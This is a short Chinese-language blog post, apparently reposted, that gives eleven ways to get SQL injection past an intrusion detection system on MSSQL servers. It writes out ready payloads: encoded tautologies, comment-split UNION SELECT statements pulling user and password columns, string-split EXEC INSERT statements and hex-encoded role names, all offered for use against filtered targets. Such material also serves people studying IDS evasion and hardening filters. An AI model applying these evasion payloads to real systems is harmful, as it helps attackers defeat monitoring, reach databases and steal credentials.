SQL Injection规避入侵检测技术总结

当我们对一个运行IDS系统的服务器进行SQL注射时,我们往往会遇到很大的麻烦,因为我们的注射语句被过滤了,如何规避这种检测手段就成了一门新的技术,本文就对此规避技术提出十一条思路和方法,与大家商戳。
一、 运用编码技术绕过,如URLEncode编码,ASCII编码绕过。
如or 1=1即%6f%72%20%31%3d%31
Test即CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)
二、 通过空格绕过,如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如or’swords’=‘swords’,由于mssql的松散性,我们可以把or ‘swords’之间的空格去掉,并不影响运行。
三、 运用字符串判断代替经典的or 1=1判断绕过,如or ‘swords’=‘swords’
四、 通过类型转换修饰符N绕过,如or ‘swords’ = N’swords’,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
五、 通过+号拆解字符串绕过,
如 or ‘swords’=‘sw’+’ords’
;EXEC(‘IN’+’SERT INTO ‘+’…..’)
六、 通过LIKE绕过,如or ‘swords’ LIKE ‘sw’
七、 通过IN绕过,如or ‘swords’ IN (‘swords’)
八、 通过BETWEEN绕过, 如or ‘swords’ BETWEEN ‘rw’ AND ‘tw’
九、 通过>或者<绕过,如
or ‘swords’>‘sw’
or ‘swords’<‘tw’
or 1<3
十、 运用注释语句绕过:
用/**/代替空格,如:
UNION /**/ Select /**/user,pwd,from tbluser
用/**/分割敏感词,如:
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
十一、 用HEX绕过,一般的IDS都无法检测出来。
0x730079007300610064006D0069006E00 =hex(sysadmin)
0x640062005F006F0077006E0065007200 =hex(db_owner)
以上的十一条SQL Injection规避入侵检测技术供您参考。 

from: http://www.d99net.net/trackback.asp?tbID=205

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值